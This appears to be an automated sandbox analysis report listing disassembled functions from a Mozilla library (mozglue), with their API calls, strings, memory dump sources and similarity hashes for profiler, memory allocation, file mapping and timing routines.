API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: ab7415e4a7914e6b213dec57f245486f181706a12ff6cb5641864c1ba795b269
Instruction ID: 1bdfff479c2b94a31c78ff3949a31b2b577b55a9b81634e7a55976a94e85e2c3
Opcode Fuzzy Hash: ab7415e4a7914e6b213dec57f245486f181706a12ff6cb5641864c1ba795b269
Instruction Fuzzy Hash: 0521E7756001049BDB009F25E844A9E77BBFF8636CF104211FD34A7742DB719826CBAE

Function 6C6B8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C67EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C67EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C6BB392,?,?,00000001), ref: 6C6B91F4

Part of subcall function 6C6ACBE8: GetCurrentProcess.KERNEL32(?,6C6731A7), ref: 6C6ACBF1
Part of subcall function 6C6ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6731A7), ref: 6C6ACBFA

Strings

timeline-ipc, xrefs: 6C6B9096
timeline-overview, xrefs: 6C6B907A
timeline-fileio, xrefs: 6C6B90A4
stack-chart, xrefs: 6C6B90B2
marker-table, xrefs: 6C6B906C
data, xrefs: 6C6B90E8
name, xrefs: 6C6B8F16
timeline-memory, xrefs: 6C6B9088
marker-chart, xrefs: 6C6B905E

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: 78e8f1c94289d35f4804811c1edc93d33bd793767733f7a92b6c787def76d795
Instruction ID: 71f484e0f03062edb3ffcee84a41d0e8ea1dada758718e815de032be57334f8f
Opcode Fuzzy Hash: 78e8f1c94289d35f4804811c1edc93d33bd793767733f7a92b6c787def76d795
Instruction Fuzzy Hash: 84B1E2B0A052099BDF04CF95C891BEEBBB6FF89308F104429D411ABF90D7319955CBE9

Function 6C69C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C69C5A3
WideCharToMultiByte.KERNEL32 ref: 6C69C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C69C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C69CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C69CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C69CAA5

Strings

(null), xrefs: 6C69C596
0, xrefs: 6C69D30A

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: b389a3ea5074eb894e0287f30ba3a7621743bc8a20465c018d236236b6b00bd6
Instruction ID: 434a3e9ab528402c4df252e1732b94a4ced101788b346b2e48b19ab73f01d309
Opcode Fuzzy Hash: b389a3ea5074eb894e0287f30ba3a7621743bc8a20465c018d236236b6b00bd6
Instruction Fuzzy Hash: 5DA1AF30609342AFDB00DF28C59475ABBF1BFCA758F04892DE99AD7641D731D809CB9A

Function 6C673480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C673492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6734A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6734EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C67350E
__Init_thread_footer.LIBCMT ref: 6C673522
__aulldiv.LIBCMT ref: 6C673552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C67357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C673592

Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1

Strings

kernel32.dll, xrefs: 6C6734EA
GetSystemTimePreciseAsFileTime, xrefs: 6C673508

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 49453486a03f4ad9996ee341fe91d26b7e35a79b6d9d0863155eb3c06ad1349e
Instruction ID: 2488d7147dee6887a24afec908c832bb8de6957349e2c51b368252636db98b63
Opcode Fuzzy Hash: 49453486a03f4ad9996ee341fe91d26b7e35a79b6d9d0863155eb3c06ad1349e
Instruction Fuzzy Hash: D131C471B002059BEF10DFBAD888AAE77B6FB86305F104429E521D3650DB709905CF6D

Function 6C674480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C6B4843,?), ref: 6C6745F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C6B4843,?), ref: 6C67468A
free.MOZGLUE(?,?,?,?,?,?,6C6B4843,?), ref: 6C6746C9
free.MOZGLUE(?), ref: 6C6746EF
free.MOZGLUE(?), ref: 6C674712
free.MOZGLUE(?), ref: 6C674735
free.MOZGLUE(?), ref: 6C674758
free.MOZGLUE(?), ref: 6C67477B
free.MOZGLUE(?), ref: 6C67479E

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: ee0e33c04e8b25b9e08f3a646fadee3ec7561237bf7532796415c1129a56edb5
Instruction ID: 7bc274157699efeb10a18dd4c2741e8735febf43f56e1433a5a0004ee595cc30
Opcode Fuzzy Hash: ee0e33c04e8b25b9e08f3a646fadee3ec7561237bf7532796415c1129a56edb5
Instruction Fuzzy Hash: 4AB10671A001148FDB28CF3CD8E87BD77A5AF46328F180A29E416DBB86D775D8408F69

Function 6C6DAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C6DAC52
CreateFileMappingW.KERNEL32 ref: 6C6DAC7D
GetSystemInfo.KERNEL32 ref: 6C6DAC98
MapViewOfFile.KERNEL32 ref: 6C6DACB0
GetSystemInfo.KERNEL32 ref: 6C6DACCD
MapViewOfFile.KERNEL32 ref: 6C6DAD05
UnmapViewOfFile.KERNEL32 ref: 6C6DAD1C
CloseHandle.KERNEL32 ref: 6C6DAD28
UnmapViewOfFile.KERNEL32 ref: 6C6DAD37
CloseHandle.KERNEL32 ref: 6C6DAD43
CloseHandle.KERNEL32 ref: 6C6DAD67

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 41c5850d8f2574063059fe1e5f38e86e03542bb051ddb164fde8f63fd6760835
Instruction ID: 3c709cdbf6361cd8845c36f5ed1707d72f6f6702420c1dadd25b0ff864ad800a
Opcode Fuzzy Hash: 41c5850d8f2574063059fe1e5f38e86e03542bb051ddb164fde8f63fd6760835
Instruction Fuzzy Hash: 5E3170B1A087048FDB00AF7DD68826EBBF1FF85345F01492DE99587211EB709449CB86

Function 6C689620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C689675
__Init_thread_footer.LIBCMT ref: 6C689697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6896E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C689707
__Init_thread_footer.LIBCMT ref: 6C68971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C689773

Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6897B7
FreeLibrary.KERNEL32 ref: 6C6897D0
FreeLibrary.KERNEL32 ref: 6C6897EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C689824

Strings

ntdll.dll, xrefs: 6C6896E3
NtMapViewOfSection, xrefs: 6C689701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C689670
MapViewOfFileNuma2, xrefs: 6C6897B1

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 405b785cf0cc64a9ee9b6cae4f02dc5b9a556be15694f8dc13280279359c8473
Instruction ID: 95d2bdbb0deaf18001530785b05009c8a1f14067cdab620b188eacae2d79d59d
Opcode Fuzzy Hash: 405b785cf0cc64a9ee9b6cae4f02dc5b9a556be15694f8dc13280279359c8473
Instruction Fuzzy Hash: DD41A0B57012059BDF00CFA6F8D4A96B7F6EB4A358F104529ED2587B40D730A805CFAE

Function 6C683E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 6C683EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C683FDC
RtlAllocateHeap.NTDLL ref: 6C684006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6840A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C683CCC), ref: 6C6840AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C683CCC), ref: 6C6840C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C684134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C683CCC), ref: 6C684143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C683CCC), ref: 6C684157

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: 7e4c333749e95ef2486b29c0eecff00b3bac0defa4e0dcf66377b43ec4a64ebb
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 64A181B1A01215CFDB40CF68C8807AAB7B5FF48318F2545AAD909AF752D771E846CFA4

Function 6C6C9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C8273), ref: 6C6C9D65
free.MOZGLUE(6C6C8273,?), ref: 6C6C9D7C
free.MOZGLUE(?,?), ref: 6C6C9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6C9E0F
free.MOZGLUE(6C6C946B,?,?), ref: 6C6C9E24
free.MOZGLUE(?,?,?), ref: 6C6C9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6C9EC8
free.MOZGLUE(6C6C946B,?,?,?), ref: 6C6C9EDF
free.MOZGLUE(?,?,?,?), ref: 6C6C9EF5

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: f4e41864c82b365101f029fc4d2347b1aeab8f286d35d697837c1767e57dc9bc
Instruction ID: 47cf202e046f2f6c6fcad783ce58ac714319064c696f4f7c110708e00fd83af6
Opcode Fuzzy Hash: f4e41864c82b365101f029fc4d2347b1aeab8f286d35d697837c1767e57dc9bc
Instruction Fuzzy Hash: 30719F70A09B418BC712CF18C48055BF3F4FF9A319B449619E85A9B711EB31F886CB8A

Function 6C6CDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C6CDDCF

Part of subcall function 6C6AFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AFA4B

Part of subcall function 6C6C90E0: free.MOZGLUE(?,00000000,?,?,6C6CDEDB), ref: 6C6C90FF
Part of subcall function 6C6C90E0: free.MOZGLUE(?,00000000,?,?,6C6CDEDB), ref: 6C6C9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CDE0D
free.MOZGLUE(00000000), ref: 6C6CDE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CDE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CDEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CDEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C6BDEFD,?,6C684A68), ref: 6C6CDF32

Part of subcall function 6C6CDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6CDB86
Part of subcall function 6C6CDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6CDC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C6BDEFD,?,6C684A68), ref: 6C6CDF65
free.MOZGLUE(?), ref: 6C6CDF80

Part of subcall function 6C695E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C695EDB
Part of subcall function 6C695E90: memset.VCRUNTIME140(ewml,000000E5,?), ref: 6C695F27
Part of subcall function 6C695E90: LeaveCriticalSection.KERNEL32(?), ref: 6C695FB2

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: b2bca46aaa2b23a520223159d0eab3545a445d8044d05873497b6b606a07ab8c
Instruction ID: 6d0ccacd52e07a4dfdd48f7563f83b0d9ea49fb65ef158e1f03cd052458afeaf
Opcode Fuzzy Hash: b2bca46aaa2b23a520223159d0eab3545a445d8044d05873497b6b606a07ab8c
Instruction Fuzzy Hash: AC51A3727416019BD7219A29D8806EEB3B2FF96308F95011CD86A53B00DB31F91BCB9F

Function 6C6D5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5DC9
std::_Facet_Register.LIBCPMT ref: 6C6D5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C6D5C8C,?,6C6AE829), ref: 6C6D5E45

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: aa4c68f561c3f345c4603a7b5151f331bbc1252b6b70978e62e0e94465c03b55
Instruction ID: b1ec9c848d94b7f71cba08e5d97ebe55e57868396172c5d450dd8ae9fa7b264e
Opcode Fuzzy Hash: aa4c68f561c3f345c4603a7b5151f331bbc1252b6b70978e62e0e94465c03b55
Instruction Fuzzy Hash: F8416E707002059FDB00EFA5D8D8AAE77F6FF89314F154069E51697B91EB30E805CB69

Function 6C6ACC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6731A7), ref: 6C6ACDDD

Strings

<jemalloc>, xrefs: 6C6ACF9F, 6C6ACFB3
: (malloc) Error in VirtualFree(), xrefs: 6C6ACFA4, 6C6ACFB8

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 52cf3b538e976a3327598f18226b1dbb035ea27016c4e4c7ecf1db3d4f8e3a48
Instruction ID: 9326e5b7ec01dba63c978be58e60674a9015e7defc28909d10e4058bf435295e
Opcode Fuzzy Hash: 52cf3b538e976a3327598f18226b1dbb035ea27016c4e4c7ecf1db3d4f8e3a48
Instruction Fuzzy Hash: A031C8707412056BFB00AFE98D45BAE7BB6BF85754F204014F522ABA80DB71D903CB9D

Function 6C67ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C67F100: LoadLibraryW.KERNEL32(shell32,?,6C6ED020), ref: 6C67F122
Part of subcall function 6C67F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C67F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C67ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C67EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C67EDCC
CreateFileW.KERNEL32 ref: 6C67EE08
free.MOZGLUE(00000000), ref: 6C67EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C67EE32

Part of subcall function 6C67EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C67EBB5
Part of subcall function 6C67EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C6AD7F3), ref: 6C67EBC3
Part of subcall function 6C67EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C6AD7F3), ref: 6C67EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C67EDC1

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: a1ece13c5dca2bad18ae7aeb64fa7c3016d1d66db6ccc7da674fac9c8d5d91ed
Instruction ID: 15c1150a4c6cf0a0477dac7b9c1eea9649bd7e9959e89c9914e12cce9c7e8515
Opcode Fuzzy Hash: a1ece13c5dca2bad18ae7aeb64fa7c3016d1d66db6ccc7da674fac9c8d5d91ed
Instruction Fuzzy Hash: 1851C071D052049FDB20DF68D9806EEB7B1AF5A318F048D2DE8556B740E730694DC7BA

Function 6C6EA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6EA565

Part of subcall function 6C6EA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6EA4BE
Part of subcall function 6C6EA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6EA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6EA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6EA6B6

Strings

0, xrefs: 6C6EA5FB
z, xrefs: 6C6EA6AE

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
